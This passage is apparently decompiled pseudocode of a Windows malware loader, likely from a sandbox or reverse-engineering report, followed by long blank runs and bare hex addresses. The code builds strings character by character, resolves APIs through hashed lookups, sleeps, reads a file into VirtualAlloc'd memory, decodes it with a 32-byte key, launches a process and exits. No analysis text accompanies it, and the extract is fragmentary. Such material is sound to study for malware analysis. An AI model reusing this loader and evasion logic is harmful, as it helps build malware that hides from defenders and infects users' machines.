				_v1502 = _t1234;
				_t1235 = 0x75;
				_v1500 = _t1235;
				_t1236 = 0x76;
				_v1498 = _t1236;
				_t1237 = 0x77;
				_v1496 = _t1237;
				_t1238 = 0x78;
				_v1494 = _t1238;
				_t1239 = 0x79;
				_v1492 = _t1239;
				_t1240 = 0x7a;
				_v1490 = _t1240;
				_t1241 = 0x61;
				_v1488 = _t1241;
				_t1242 = 0x62;
				_v1486 = _t1242;
				_t1243 = 0x63;
				_v1484 = _t1243;
				_t1244 = 0x64;
				_v1482 = _t1244;
				_t1245 = 0x65;
				_v1480 = _t1245;
				_t1246 = 0x66;
				_v1478 = _t1246;
				_t1247 = 0x67;
				_v1476 = _t1247;
				_t1248 = 0x68;
				_v1474 = _t1248;
				_t1249 = 0x69;
				_v1472 = _t1249;
				_t1250 = 0x6a;
				_v1470 = _t1250;
				_t1251 = 0x6b;
				_v1468 = _t1251;
				_t1252 = 0x6c;
				_v1466 = _t1252;
				_t1253 = 0x6d;
				_v1464 = _t1253;
				_t1254 = 0x6e;
				_v1462 = _t1254;
				_t1255 = 0x6f;
				_v1460 = _t1255;
				_t1256 = 0x70;
				_v1458 = _t1256;
				_t1257 = 0x71;
				_v1456 = _t1257;
				_t1258 = 0x72;
				_v1454 = _t1258;
				_t1259 = 0x73;
				_v1452 = _t1259;
				_t1260 = 0x74;
				_v1450 = _t1260;
				_t1261 = 0x75;
				_v1448 = _t1261;
				_t1262 = 0x76;
				_v1446 = _t1262;
				_t1263 = 0x77;
				_v1444 = _t1263;
				_t1264 = 0x78;
				_v1442 = _t1264;
				_t1265 = 0x79;
				_v1440 = _t1265;
				_t1266 = 0x7a;
				_v1438 = _t1266;
				_t1267 = 0x61;
				_v1436 = _t1267;
				_t1268 = 0x62;
				_v1434 = _t1268;
				_t1269 = 0x63;
				_v1432 = _t1269;
				_t1270 = 0x64;
				_v1430 = _t1270;
				_t1271 = 0x65;
				_v1428 = _t1271;
				_t1272 = 0x66;
				_v1426 = _t1272;
				_t1273 = 0x67;
				_v1424 = _t1273;
				_t1274 = 0x68;
				_v1422 = _t1274;
				_t1275 = 0x69;
				_v1420 = _t1275;
				_t1276 = 0x6a;
				_v1418 = _t1276;
				_t1277 = 0x6b;
				_v1416 = _t1277;
				_t1278 = 0x6c;
				_v1414 = _t1278;
				_t1279 = 0x6d;
				_v1412 = _t1279;
				_t1280 = 0x6e;
				_v1410 = _t1280;
				_t1281 = 0x6f;
				_v1408 = _t1281;
				_t1282 = 0x70;
				_v1406 = _t1282;
				_t1283 = 0x71;
				_v1404 = _t1283;
				_t1284 = 0x72;
				_v1402 = _t1284;
				_t1285 = 0x73;
				_v1400 = _t1285;
				_t1286 = 0x74;
				_v1398 = _t1286;
				_t1287 = 0x75;
				_v1396 = _t1287;
				_t1288 = 0x76;
				_v1394 = _t1288;
				_t1289 = 0x77;
				_v1392 = _t1289;
				_t1290 = 0x78;
				_v1390 = _t1290;
				_t1291 = 0x79;
				_v1388 = _t1291;
				_t1292 = 0x7a;
				_v1386 = _t1292;
				_t1293 = 0x61;
				_v1384 = _t1293;
				_t1294 = 0x62;
				_v1382 = _t1294;
				_t1295 = 0x63;
				_v1380 = _t1295;
				_t1296 = 0x64;
				_v1378 = _t1296;
				_t1297 = 0x65;
				_v1376 = _t1297;
				_t1298 = 0x66;
				_v1374 = _t1298;
				_t1299 = 0x67;
				_v1372 = _t1299;
				_t1300 = 0x68;
				_v1370 = _t1300;
				_t1301 = 0x69;
				_v1368 = _t1301;
				_t1302 = 0x6a;
				_v1366 = _t1302;
				_t1303 = 0x6b;
				_v1364 = _t1303;
				_t1304 = 0x6c;
				_v1362 = _t1304;
				_t1305 = 0x6d;
				_v1360 = _t1305;
				_t1306 = 0x6e;
				_v1358 = _t1306;
				_t1307 = 0x6f;
				_v1356 = _t1307;
				_t1308 = 0x70;
				_v1354 = _t1308;
				_t1309 = 0x71;
				_v1352 = _t1309;
				_t1310 = 0x72;
				_v1350 = _t1310;
				_t1311 = 0x73;
				_v1348 = _t1311;
				_t1312 = 0x74;
				_v1346 = _t1312;
				_t1313 = 0x75;
				_v1344 = _t1313;
				_t1314 = 0x76;
				_v1342 = _t1314;
				_t1315 = 0x77;
				_v1340 = _t1315;
				_t1316 = 0x78;
				_v1338 = _t1316;
				_t1317 = 0x79;
				_v1336 = _t1317;
				_t1318 = 0x7a;
				_v1334 = _t1318;
				_t1319 = 0x61;
				_v1332 = _t1319;
				_t1320 = 0x62;
				_v1330 = _t1320;
				_t1321 = 0x63;
				_v1328 = _t1321;
				_t1322 = 0x64;
				_v1326 = _t1322;
				_t1323 = 0x65;
				_v1324 = _t1323;
				_t1324 = 0x66;
				_v1322 = _t1324;
				_t1325 = 0x67;
				_v1320 = _t1325;
				_t1326 = 0x68;
				_v1318 = _t1326;
				_t1327 = 0x69;
				_v1316 = _t1327;
				_t1328 = 0x6a;
				_v1314 = _t1328;
				_t1329 = 0x6b;
				_v1312 = _t1329;
				_t1330 = 0x6c;
				_v1310 = _t1330;
				_t1331 = 0x6d;
				_v1308 = _t1331;
				_t1332 = 0x6e;
				_v1306 = _t1332;
				_t1333 = 0x6f;
				_v1304 = _t1333;
				_t1334 = 0x70;
				_v1302 = _t1334;
				_t1335 = 0x71;
				_v1300 = _t1335;
				_t1336 = 0x72;
				_v1298 = _t1336;
				_t1337 = 0x73;
				_v1296 = _t1337;
				_t1338 = 0x74;
				_v1294 = _t1338;
				_t1339 = 0x75;
				_v1292 = _t1339;
				_t1340 = 0x76;
				_v1290 = _t1340;
				_t1341 = 0x77;
				_v1288 = _t1341;
				_t1342 = 0x78;
				_v1286 = _t1342;
				_t1343 = 0x79;
				_v1284 = _t1343;
				_t1344 = 0x7a;
				_v1282 = _t1344;
				_t1345 = 0x61;
				_v1280 = _t1345;
				_t1346 = 0x62;
				_v1278 = _t1346;
				_t1347 = 0x63;
				_v1276 = _t1347;
				_t1348 = 0x64;
				_v1274 = _t1348;
				_t1349 = 0x65;
				_v1272 = _t1349;
				_t1350 = 0x66;
				_v1270 = _t1350;
				_t1351 = 0x67;
				_v1268 = _t1351;
				_t1352 = 0x68;
				_v1266 = _t1352;
				_t1353 = 0x69;
				_v1264 = _t1353;
				_t1354 = 0x6a;
				_v1262 = _t1354;
				_t1355 = 0x6b;
				_v1260 = _t1355;
				_t1356 = 0x6c;
				_v1258 = _t1356;
				_t1357 = 0x6d;
				_v1256 = _t1357;
				_t1358 = 0x6e;
				_v1254 = _t1358;
				_t1359 = 0x6f;
				_v1252 = _t1359;
				_t1360 = 0x70;
				_v1250 = _t1360;
				_t1361 = 0x71;
				_v1248 = _t1361;
				_t1362 = 0x72;
				_v1246 = _t1362;
				_t1363 = 0x73;
				_v1244 = _t1363;
				_t1364 = 0x74;
				_v1242 = _t1364;
				_t1365 = 0x75;
				_v1240 = _t1365;
				_t1366 = 0x76;
				_v1238 = _t1366;
				_t1367 = 0x77;
				_v1236 = _t1367;
				_t1368 = 0x78;
				_v1234 = _t1368;
				_t1369 = 0x79;
				_v1232 = _t1369;
				_t1370 = 0x7a;
				_v1230 = _t1370;
				_t1371 = 0x61;
				_v1228 = _t1371;
				_t1372 = 0x62;
				_v1226 = _t1372;
				_t1373 = 0x63;
				_v1224 = _t1373;
				_t1374 = 0x64;
				_v1222 = _t1374;
				_t1375 = 0x65;
				_v1220 = _t1375;
				_t1376 = 0x66;
				_v1218 = _t1376;
				_t1377 = 0x67;
				_v1216 = _t1377;
				_t1378 = 0x68;
				_v1214 = _t1378;
				_t1379 = 0x69;
				_v1212 = _t1379;
				_t1380 = 0x6a;
				_v1210 = _t1380;
				_t1381 = 0x6b;
				_v1208 = _t1381;
				_t1382 = 0x6c;
				_v1206 = _t1382;
				_t1383 = 0x6d;
				_v1204 = _t1383;
				_t1384 = 0x6e;
				_v1202 = _t1384;
				_t1385 = 0x6f;
				_v1200 = _t1385;
				_t1386 = 0x70;
				_v1198 = _t1386;
				_t1387 = 0x71;
				_v1196 = _t1387;
				_t1388 = 0x72;
				_v1194 = _t1388;
				_t1389 = 0x73;
				_v1192 = _t1389;
				_t1390 = 0x74;
				_v1190 = _t1390;
				_t1391 = 0x75;
				_v1188 = _t1391;
				_t1392 = 0x76;
				_v1186 = _t1392;
				_t1393 = 0x77;
				_v1184 = _t1393;
				_t1394 = 0x78;
				_v1182 = _t1394;
				_t1395 = 0x79;
				_v1180 = _t1395;
				_t1396 = 0x7a;
				_v1178 = _t1396;
				_t1397 = 0x61;
				_v1176 = _t1397;
				_t1398 = 0x62;
				_v1174 = _t1398;
				_t1399 = 0x63;
				_v1172 = _t1399;
				_t1400 = 0x64;
				_v1170 = _t1400;
				_t1401 = 0x65;
				_v1168 = _t1401;
				_t1402 = 0x66;
				_v1166 = _t1402;
				_t1403 = 0x67;
				_v1164 = _t1403;
				_t1404 = 0x68;
				_v1162 = _t1404;
				_t1405 = 0x69;
				_v1160 = _t1405;
				_t1406 = 0x6a;
				_v1158 = _t1406;
				_t1407 = 0x6b;
				_v1156 = _t1407;
				_t1408 = 0x6c;
				_v1154 = _t1408;
				_t1409 = 0x6d;
				_v1152 = _t1409;
				_t1410 = 0x6e;
				_v1150 = _t1410;
				_t1411 = 0x6f;
				_v1148 = _t1411;
				_t1412 = 0x70;
				_v1146 = _t1412;
				_t1413 = 0x71;
				_v1144 = _t1413;
				_t1414 = 0x72;
				_v1142 = _t1414;
				_t1415 = 0x73;
				_v1140 = _t1415;
				_t1416 = 0x74;
				_v1138 = _t1416;
				_t1417 = 0x75;
				_v1136 = _t1417;
				_t1418 = 0x76;
				_v1134 = _t1418;
				_t1419 = 0x77;
				_v1132 = _t1419;
				_t1420 = 0x78;
				_v1130 = _t1420;
				_t1421 = 0x79;
				_v1128 = _t1421;
				_t1422 = 0x7a;
				_v1126 = _t1422;
				_t1423 = 0x2e;
				_v1124 = _t1423;
				_t1424 = 0x65;
				_v1122 = _t1424;
				_t1425 = 0x78;
				_v1120 = _t1425;
				_t1426 = 0x65;
				_v1118 = _t1426;
				_v1116 = 0;
				_t1428 = 0x61;
				_v588 = _t1428;
				_t1429 = 0x62;
				_v586 = _t1429;
				_t1430 = 0x63;
				_v584 = _t1430;
				_t1431 = 0x64;
				_v582 = _t1431;
				_t1432 = 0x65;
				_v580 = _t1432;
				_t1433 = 0x66;
				_v578 = _t1433;
				_t1434 = 0x67;
				_v576 = _t1434;
				_t1435 = 0x68;
				_v574 = _t1435;
				_t1436 = 0x69;
				_v572 = _t1436;
				_t1437 = 0x6a;
				_v570 = _t1437;
				_t1438 = 0x6b;
				_v568 = _t1438;
				_t1439 = 0x6c;
				_v566 = _t1439;
				_t1440 = 0x6d;
				_v564 = _t1440;
				_t1441 = 0x6e;
				_v562 = _t1441;
				_t1442 = 0x6f;
				_v560 = _t1442;
				_t1443 = 0x70;
				_v558 = _t1443;
				_t1444 = 0x71;
				_v556 = _t1444;
				_t1445 = 0x72;
				_v554 = _t1445;
				_t1446 = 0x73;
				_v552 = _t1446;
				_t1447 = 0x74;
				_v550 = _t1447;
				_t1448 = 0x75;
				_v548 = _t1448;
				_t1449 = 0x76;
				_v546 = _t1449;
				_t1450 = 0x77;
				_v544 = _t1450;
				_t1451 = 0x78;
				_v542 = _t1451;
				_t1452 = 0x79;
				_v540 = _t1452;
				_t1453 = 0x7a;
				_v538 = _t1453;
				_t1454 = 0x61;
				_v536 = _t1454;
				_t1455 = 0x62;
				_v534 = _t1455;
				_t1456 = 0x63;
				_v532 = _t1456;
				_t1457 = 0x64;
				_v530 = _t1457;
				_t1458 = 0x65;
				_v528 = _t1458;
				_t1459 = 0x66;
				_v526 = _t1459;
				_t1460 = 0x67;
				_v524 = _t1460;
				_t1461 = 0x68;
				_v522 = _t1461;
				_t1462 = 0x69;
				_v520 = _t1462;
				_t1463 = 0x6a;
				_v518 = _t1463;
				_t1464 = 0x6b;
				_v516 = _t1464;
				_t1465 = 0x6c;
				_v514 = _t1465;
				_t1466 = 0x6d;
				_v512 = _t1466;
				_t1467 = 0x6e;
				_v510 = _t1467;
				_t1468 = 0x6f;
				_v508 = _t1468;
				_t1469 = 0x70;
				_v506 = _t1469;
				_t1470 = 0x71;
				_v504 = _t1470;
				_t1471 = 0x72;
				_v502 = _t1471;
				_t1472 = 0x73;
				_v500 = _t1472;
				_t1473 = 0x74;
				_v498 = _t1473;
				_t1474 = 0x75;
				_v496 = _t1474;
				_t1475 = 0x76;
				_v494 = _t1475;
				_t1476 = 0x77;
				_v492 = _t1476;
				_t1477 = 0x78;
				_v490 = _t1477;
				_t1478 = 0x79;
				_v488 = _t1478;
				_t1479 = 0x7a;
				_v486 = _t1479;
				_t1480 = 0x61;
				_v484 = _t1480;
				_t1481 = 0x62;
				_v482 = _t1481;
				_t1482 = 0x63;
				_v480 = _t1482;
				_t1483 = 0x64;
				_v478 = _t1483;
				_t1484 = 0x65;
				_v476 = _t1484;
				_t1485 = 0x66;
				_v474 = _t1485;
				_t1486 = 0x67;
				_v472 = _t1486;
				_t1487 = 0x68;
				_v470 = _t1487;
				_t1488 = 0x69;
				_v468 = _t1488;
				_t1489 = 0x6a;
				_v466 = _t1489;
				_t1490 = 0x6b;
				_v464 = _t1490;
				_t1491 = 0x6c;
				_v462 = _t1491;
				_t1492 = 0x6d;
				_v460 = _t1492;
				_t1493 = 0x6e;
				_v458 = _t1493;
				_t1494 = 0x6f;
				_v456 = _t1494;
				_t1495 = 0x70;
				_v454 = _t1495;
				_t1496 = 0x71;
				_v452 = _t1496;
				_t1497 = 0x72;
				_v450 = _t1497;
				_t1498 = 0x73;
				_v448 = _t1498;
				_t1499 = 0x74;
				_v446 = _t1499;
				_t1500 = 0x75;
				_v444 = _t1500;
				_t1501 = 0x76;
				_v442 = _t1501;
				_t1502 = 0x77;
				_v440 = _t1502;
				_t1503 = 0x78;
				_v438 = _t1503;
				_t1504 = 0x79;
				_v436 = _t1504;
				_t1505 = 0x7a;
				_v434 = _t1505;
				_t1506 = 0x61;
				_v432 = _t1506;
				_t1507 = 0x62;
				_v430 = _t1507;
				_t1508 = 0x63;
				_v428 = _t1508;
				_t1509 = 0x64;
				_v426 = _t1509;
				_t1510 = 0x65;
				_v424 = _t1510;
				_t1511 = 0x66;
				_v422 = _t1511;
				_t1512 = 0x67;
				_v420 = _t1512;
				_t1513 = 0x68;
				_v418 = _t1513;
				_t1514 = 0x69;
				_v416 = _t1514;
				_t1515 = 0x6a;
				_v414 = _t1515;
				_t1516 = 0x6b;
				_v412 = _t1516;
				_t1517 = 0x6c;
				_v410 = _t1517;
				_t1518 = 0x6d;
				_v408 = _t1518;
				_t1519 = 0x6e;
				_v406 = _t1519;
				_t1520 = 0x6f;
				_v404 = _t1520;
				_t1521 = 0x70;
				_v402 = _t1521;
				_t1522 = 0x71;
				_v400 = _t1522;
				_t1523 = 0x72;
				_v398 = _t1523;
				_t1524 = 0x73;
				_v396 = _t1524;
				_t1525 = 0x74;
				_v394 = _t1525;
				_t1526 = 0x75;
				_v392 = _t1526;
				_t1527 = 0x76;
				_v390 = _t1527;
				_t1528 = 0x77;
				_v388 = _t1528;
				_t1529 = 0x78;
				_v386 = _t1529;
				_t1530 = 0x79;
				_v384 = _t1530;
				_t1531 = 0x7a;
				_v382 = _t1531;
				_t1532 = 0x61;
				_v380 = _t1532;
				_t1533 = 0x62;
				_v378 = _t1533;
				_t1534 = 0x63;
				_v376 = _t1534;
				_t1535 = 0x64;
				_v374 = _t1535;
				_t1536 = 0x65;
				_v372 = _t1536;
				_t1537 = 0x66;
				_v370 = _t1537;
				_t1538 = 0x67;
				_v368 = _t1538;
				_t1539 = 0x68;
				_v366 = _t1539;
				_t1540 = 0x69;
				_v364 = _t1540;
				_t1541 = 0x6a;
				_v362 = _t1541;
				_t1542 = 0x6b;
				_v360 = _t1542;
				_t1543 = 0x6c;
				_v358 = _t1543;
				_t1544 = 0x6d;
				_v356 = _t1544;
				_t1545 = 0x6e;
				_v354 = _t1545;
				_t1546 = 0x6f;
				_v352 = _t1546;
				_t1547 = 0x70;
				_v350 = _t1547;
				_t1548 = 0x71;
				_v348 = _t1548;
				_t1549 = 0x72;
				_v346 = _t1549;
				_t1550 = 0x73;
				_v344 = _t1550;
				_t1551 = 0x74;
				_v342 = _t1551;
				_t1552 = 0x75;
				_v340 = _t1552;
				_t1553 = 0x76;
				_v338 = _t1553;
				_t1554 = 0x77;
				_v336 = _t1554;
				_t1555 = 0x78;
				_v334 = _t1555;
				_t1556 = 0x79;
				_v332 = _t1556;
				_t1557 = 0x7a;
				_v330 = _t1557;
				_t1558 = 0x61;
				_v328 = _t1558;
				_t1559 = 0x62;
				_v326 = _t1559;
				_t1560 = 0x63;
				_v324 = _t1560;
				_t1561 = 0x64;
				_v322 = _t1561;
				_t1562 = 0x65;
				_v320 = _t1562;
				_t1563 = 0x66;
				_v318 = _t1563;
				_t1564 = 0x67;
				_v316 = _t1564;
				_t1565 = 0x68;
				_v314 = _t1565;
				_t1566 = 0x69;
				_v312 = _t1566;
				_t1567 = 0x6a;
				_v310 = _t1567;
				_t1568 = 0x6b;
				_v308 = _t1568;
				_t1569 = 0x6c;
				_v306 = _t1569;
				_t1570 = 0x6d;
				_v304 = _t1570;
				_t1571 = 0x6e;
				_v302 = _t1571;
				_t1572 = 0x6f;
				_v300 = _t1572;
				_t1573 = 0x70;
				_v298 = _t1573;
				_t1574 = 0x71;
				_v296 = _t1574;
				_t1575 = 0x72;
				_v294 = _t1575;
				_t1576 = 0x73;
				_v292 = _t1576;
				_t1577 = 0x74;
				_v290 = _t1577;
				_t1578 = 0x75;
				_v288 = _t1578;
				_t1579 = 0x76;
				_v286 = _t1579;
				_t1580 = 0x77;
				_v284 = _t1580;
				_t1581 = 0x78;
				_v282 = _t1581;
				_t1582 = 0x79;
				_v280 = _t1582;
				_t1583 = 0x7a;
				_v278 = _t1583;
				_t1584 = 0x61;
				_v276 = _t1584;
				_t1585 = 0x62;
				_v274 = _t1585;
				_t1586 = 0x63;
				_v272 = _t1586;
				_t1587 = 0x64;
				_v270 = _t1587;
				_t1588 = 0x65;
				_v268 = _t1588;
				_t1589 = 0x66;
				_v266 = _t1589;
				_t1590 = 0x67;
				_v264 = _t1590;
				_t1591 = 0x68;
				_v262 = _t1591;
				_t1592 = 0x69;
				_v260 = _t1592;
				_t1593 = 0x6a;
				_v258 = _t1593;
				_t1594 = 0x6b;
				_v256 = _t1594;
				_t1595 = 0x6c;
				_v254 = _t1595;
				_t1596 = 0x6d;
				_v252 = _t1596;
				_t1597 = 0x6e;
				_v250 = _t1597;
				_t1598 = 0x6f;
				_v248 = _t1598;
				_t1599 = 0x70;
				_v246 = _t1599;
				_t1600 = 0x71;
				_v244 = _t1600;
				_t1601 = 0x72;
				_v242 = _t1601;
				_t1602 = 0x73;
				_v240 = _t1602;
				_t1603 = 0x74;
				_v238 = _t1603;
				_t1604 = 0x75;
				_v236 = _t1604;
				_t1605 = 0x76;
				_v234 = _t1605;
				_t1606 = 0x77;
				_v232 = _t1606;
				_t1607 = 0x78;
				_v230 = _t1607;
				_t1608 = 0x79;
				_v228 = _t1608;
				_t1609 = 0x7a;
				_v226 = _t1609;
				_t1610 = 0x61;
				_v224 = _t1610;
				_t1611 = 0x62;
				_v222 = _t1611;
				_t1612 = 0x63;
				_v220 = _t1612;
				_t1613 = 0x64;
				_v218 = _t1613;
				_t1614 = 0x65;
				_v216 = _t1614;
				_t1615 = 0x66;
				_v214 = _t1615;
				_t1616 = 0x67;
				_v212 = _t1616;
				_t1617 = 0x68;
				_v210 = _t1617;
				_t1618 = 0x69;
				_v208 = _t1618;
				_t1619 = 0x6a;
				_v206 = _t1619;
				_t1620 = 0x6b;
				_v204 = _t1620;
				_t1621 = 0x6c;
				_v202 = _t1621;
				_t1622 = 0x6d;
				_v200 = _t1622;
				_t1623 = 0x6e;
				_v198 = _t1623;
				_t1624 = 0x6f;
				_v196 = _t1624;
				_t1625 = 0x70;
				_v194 = _t1625;
				_t1626 = 0x71;
				_v192 = _t1626;
				_t1627 = 0x72;
				_v190 = _t1627;
				_t1628 = 0x73;
				_v188 = _t1628;
				_t1629 = 0x74;
				_v186 = _t1629;
				_t1630 = 0x75;
				_v184 = _t1630;
				_t1631 = 0x76;
				_v182 = _t1631;
				_t1632 = 0x77;
				_v180 = _t1632;
				_t1633 = 0x78;
				_v178 = _t1633;
				_t1634 = 0x79;
				_v176 = _t1634;
				_t1635 = 0x7a;
				_v174 = _t1635;
				_t1636 = 0x61;
				_v172 = _t1636;
				_t1637 = 0x62;
				_v170 = _t1637;
				_t1638 = 0x63;
				_v168 = _t1638;
				_t1639 = 0x64;
				_v166 = _t1639;
				_t1640 = 0x65;
				_v164 = _t1640;
				_t1641 = 0x66;
				_v162 = _t1641;
				_t1642 = 0x67;
				_v160 = _t1642;
				_t1643 = 0x68;
				_v158 = _t1643;
				_t1644 = 0x69;
				_v156 = _t1644;
				_t1645 = 0x6a;
				_v154 = _t1645;
				_t1646 = 0x6b;
				_v152 = _t1646;
				_t1647 = 0x6c;
				_v150 = _t1647;
				_t1648 = 0x6d;
				_v148 = _t1648;
				_t1649 = 0x6e;
				_v146 = _t1649;
				_t1650 = 0x6f;
				_v144 = _t1650;
				_t1651 = 0x70;
				_v142 = _t1651;
				_t1652 = 0x71;
				_v140 = _t1652;
				_t1653 = 0x72;
				_v138 = _t1653;
				_t1654 = 0x73;
				_v136 = _t1654;
				_t1655 = 0x74;
				_v134 = _t1655;
				_t1656 = 0x75;
				_v132 = _t1656;
				_t1657 = 0x76;
				_v130 = _t1657;
				_t1658 = 0x77;
				_v128 = _t1658;
				_t1659 = 0x78;
				_v126 = _t1659;
				_t1660 = 0x79;
				_v124 = _t1660;
				_t1661 = 0x7a;
				_v122 = _t1661;
				_t1662 = 0x61;
				_v120 = _t1662;
				_t1663 = 0x62;
				_v118 = _t1663;
				_t1664 = 0x63;
				_v116 = _t1664;
				_t1665 = 0x64;
				_v114 = _t1665;
				_t1666 = 0x65;
				_v112 = _t1666;
				_t1667 = 0x66;
				_v110 = _t1667;
				_t1668 = 0x67;
				_v108 = _t1668;
				_t1669 = 0x68;
				_v106 = _t1669;
				_t1670 = 0x69;
				_v104 = _t1670;
				_t1671 = 0x6a;
				_v102 = _t1671;
				_t1672 = 0x6b;
				_v100 = _t1672;
				_t1673 = 0x6c;
				_v98 = _t1673;
				_t1674 = 0x6d;
				_v96 = _t1674;
				_t1675 = 0x6e;
				_v94 = _t1675;
				_t1676 = 0x6f;
				_v92 = _t1676;
				_t1677 = 0x70;
				_v90 = _t1677;
				_t1678 = 0x71;
				_v88 = _t1678;
				_t1679 = 0x72;
				_v86 = _t1679;
				_t1680 = 0x73;
				_v84 = _t1680;
				_t1681 = 0x74;
				_v82 = _t1681;
				_t1682 = 0x75;
				_v80 = _t1682;
				_t1683 = 0x76;
				_v78 = _t1683;
				_t1684 = 0x77;
				_v76 = _t1684;
				_t1685 = 0x78;
				_v74 = _t1685;
				_t1686 = 0x79;
				_v72 = _t1686;
				_t1687 = 0x7a;
				_v70 = _t1687;
				_v68 = 0;
				_v8 = E6EEE6B57();
				_v60 = E6EEE6BFF(_v8, 0x34cf0bf);
				_v64 = E6EEE6BFF(_v8, 0x55e38b1f);
				_v1648 = E6EEE6BFF(_v8, 0xd1775dc4);
				_v1700 = E6EEE6BFF(_v8, 0xd6eb2188);
				_v1676 = E6EEE6BFF(_v8, 0xa2eae210);
				_v1704 = E6EEE6BFF(_v8, 0xcd8538b2);
				_v1652 = E6EEE6BFF(_v8, 0x8a111d91);
				_v1656 = E6EEE6BFF(_v8, 0x170c1ca1);
				_v1660 = E6EEE6BFF(_v8, 0xa5f15738);
				_v1668 = E6EEE6BFF(_v8, 0x433a3842);
				_v1672 = E6EEE6BFF(_v8, 0x2ffe2c64);
				_v1692 = 0x2d734193;
				_v1688 = 0x63daa681;
				_v1684 = 0x26090612;
				_v1680 = 0x6f28fae0;
				_t1701 = 4;
				_t1703 = E6EEE4211(_t1740,  *((intOrPtr*)(_t1739 + _t1701 * 0 - 0x698))); // executed
				_t1741 = _t1703;
				if(_t1703 != 0) {
					L4:
					_v60(0x7918);
					L5:
					E6EEE6640(_t1737, _t1744,  &_v1112,  &_v1644,  &_v588); // executed
					_v1648(0,  &_v2828, 0x103);
					_t1711 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
					_v20 = _t1711;
					if(_v20 != 0xffffffff) {
						_t1712 = _v1656(_v20, 0);
						_v16 = _t1712;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t1713 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t1713;
							__eflags = _v12;
							if(_v12 != 0) {
								_t1715 = ReadFile(_v20, _v12, _v16,  &_v1664, 0);
								__eflags = _t1715;
								if(_t1715 != 0) {
									_t889 =  &_v56; // 0x63
									E6EEE4015(_v12, _t889, 0x20);
									_t1718 = E6EEE3034(_t1737, _t1738, __eflags, _v12); // executed
									__eflags = _t1718;
									if(_t1718 != 0) {
										_v60(0xbb8);
										E6EEE3005(_t1737,  &_v1720, 0x10);
										E6EEE3005(_t1737,  &_v1788, 0x44);
										_t1718 = _v1676( &_v2828, _v1672(0, 0, 0, 0x20, 0, 0,  &_v1788,  &_v1720));
										__eflags = _t1718;
										if(_t1718 != 0) {
											_t1718 = _v64(0);
										}
									}
									ExitProcess(0);
								}
								return _t1715;
							}
							return _t1713;
						}
						return _t1712;
					}
					return _t1711;
				}
				_t1728 = 4;
				_t1730 = E6EEE4211(_t1741,  *((intOrPtr*)(_t1739 + (_t1728 << 0) - 0x698))); // executed
				_t1742 = _t1730;
				if(_t1730 != 0) {
					goto L4;
				}
				_t1731 = 4;
				_t1733 = E6EEE4211(_t1742,  *((intOrPtr*)(_t1739 + (_t1731 << 1) - 0x698))); // executed
				_t1743 = _t1733;
				if(_t1733 != 0) {
					goto L4;
				}
				_t1734 = 4;
				_t1736 = E6EEE4211(_t1743,  *((intOrPtr*)(_t1739 + _t1734 * 3 - 0x698))); // executed
				_t1744 = _t1736;
				if(_t1736 == 0) {
					goto L5;
				}
				goto L4;
			}
















































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































                                                                                0x6eee42b4
                                                                                0x6eee42b4
                                                                                0x6eee42b4
                                                                                0x6eee42bd
                                                                                0x6eee42c1
                                                                                0x6eee42c8
                                                                                0x6eee42cc
                                                                                0x6eee42d0
                                                                                0x6eee42d4
                                                                                0x6eee42d8
                                                                                0x6eee42dc
                                                                                0x6eee42e0
                                                                                0x6eee42e4
                                                                                0x6eee42e8
                                                                                0x6eee42ec
                                                                                0x6eee42f0
                                                                                0x6eee42f4
                                                                                0x6eee42f8
                                                                                0x6eee42fc
                                                                                0x6eee4300
                                                                                0x6eee4304
                                                                                0x6eee4308
                                                                                0x6eee430c
                                                                                0x6eee4310
                                                                                0x6eee4314
                                                                                0x6eee4318
                                                                                0x6eee431c
                                                                                0x6eee4320
                                                                                0x6eee4324
                                                                                0x6eee4328
                                                                                0x6eee432c
                                                                                0x6eee4330
                                                                                0x6eee4334
                                                                                0x6eee4338
                                                                                0x6eee433c
                                                                                0x6eee4340
                                                                                0x6eee4344
                                                                                0x6eee4348
                                                                                0x6eee434c
                                                                                0x6eee4350
                                                                                0x6eee4357
                                                                                0x6eee435d
                                                                                0x6eee435e
                                                                                0x6eee4367
                                                                                0x6eee4368
                                                                                0x6eee4371
                                                                                0x6eee4372
                                                                                0x6eee437b
                                                                                0x6eee437c
                                                                                0x6eee4385
                                                                                0x6eee4386
                                                                                0x6eee438f
                                                                                0x6eee4390
                                                                                0x6eee4399
                                                                                0x6eee439a
                                                                                0x6eee43a3
                                                                                0x6eee43a4
                                                                                0x6eee43ad
                                                                                0x6eee43ae
                                                                                0x6eee43b7
                                                                                0x6eee43b8
                                                                                0x6eee43c1
                                                                                0x6eee43c2
                                                                                0x6eee43cb
                                                                                0x6eee43cc
                                                                                0x6eee43d5
                                                                                0x6eee43d6
                                                                                0x6eee43df
                                                                                0x6eee43e0
                                                                                0x6eee43e9
                                                                                0x6eee43ea
                                                                                0x6eee43f3
                                                                                0x6eee43f4
                                                                                0x6eee43fd
                                                                                0x6eee43fe
                                                                                0x6eee4407
                                                                                0x6eee4408
                                                                                0x6eee4411
                                                                                0x6eee4412
                                                                                0x6eee441b
                                                                                0x6eee441c
                                                                                0x6eee4425
                                                                                0x6eee4426
                                                                                0x6eee442f
                                                                                0x6eee4430
                                                                                0x6eee4439
                                                                                0x6eee443a
                                                                                0x6eee4443
                                                                                0x6eee4444
                                                                                0x6eee444d
                                                                                0x6eee444e
                                                                                0x6eee4457
                                                                                0x6eee4458
                                                                                0x6eee4461
                                                                                0x6eee4462
                                                                                0x6eee446b
                                                                                0x6eee446c
                                                                                0x6eee4475
                                                                                0x6eee4476
                                                                                0x6eee447f
                                                                                0x6eee4480
                                                                                0x6eee4489
                                                                                0x6eee448a
                                                                                0x6eee4493
                                                                                0x6eee4494
                                                                                0x6eee449d
                                                                                0x6eee449e
                                                                                0x6eee44a7
                                                                                0x6eee44a8
                                                                                0x6eee44b1
                                                                                0x6eee44b2
                                                                                0x6eee44bb
                                                                                0x6eee44bc
                                                                                0x6eee44c5
                                                                                0x6eee44c6
                                                                                0x6eee44cf
                                                                                0x6eee44d0
                                                                                0x6eee44d9
                                                                                0x6eee44da
                                                                                0x6eee44e3
                                                                                0x6eee44e4
                                                                                0x6eee44ed
                                                                                0x6eee44ee
                                                                                0x6eee44f7
                                                                                0x6eee44f8
                                                                                0x6eee4501
                                                                                0x6eee4502
                                                                                0x6eee450b
                                                                                0x6eee450c
                                                                                0x6eee4515
                                                                                0x6eee4516
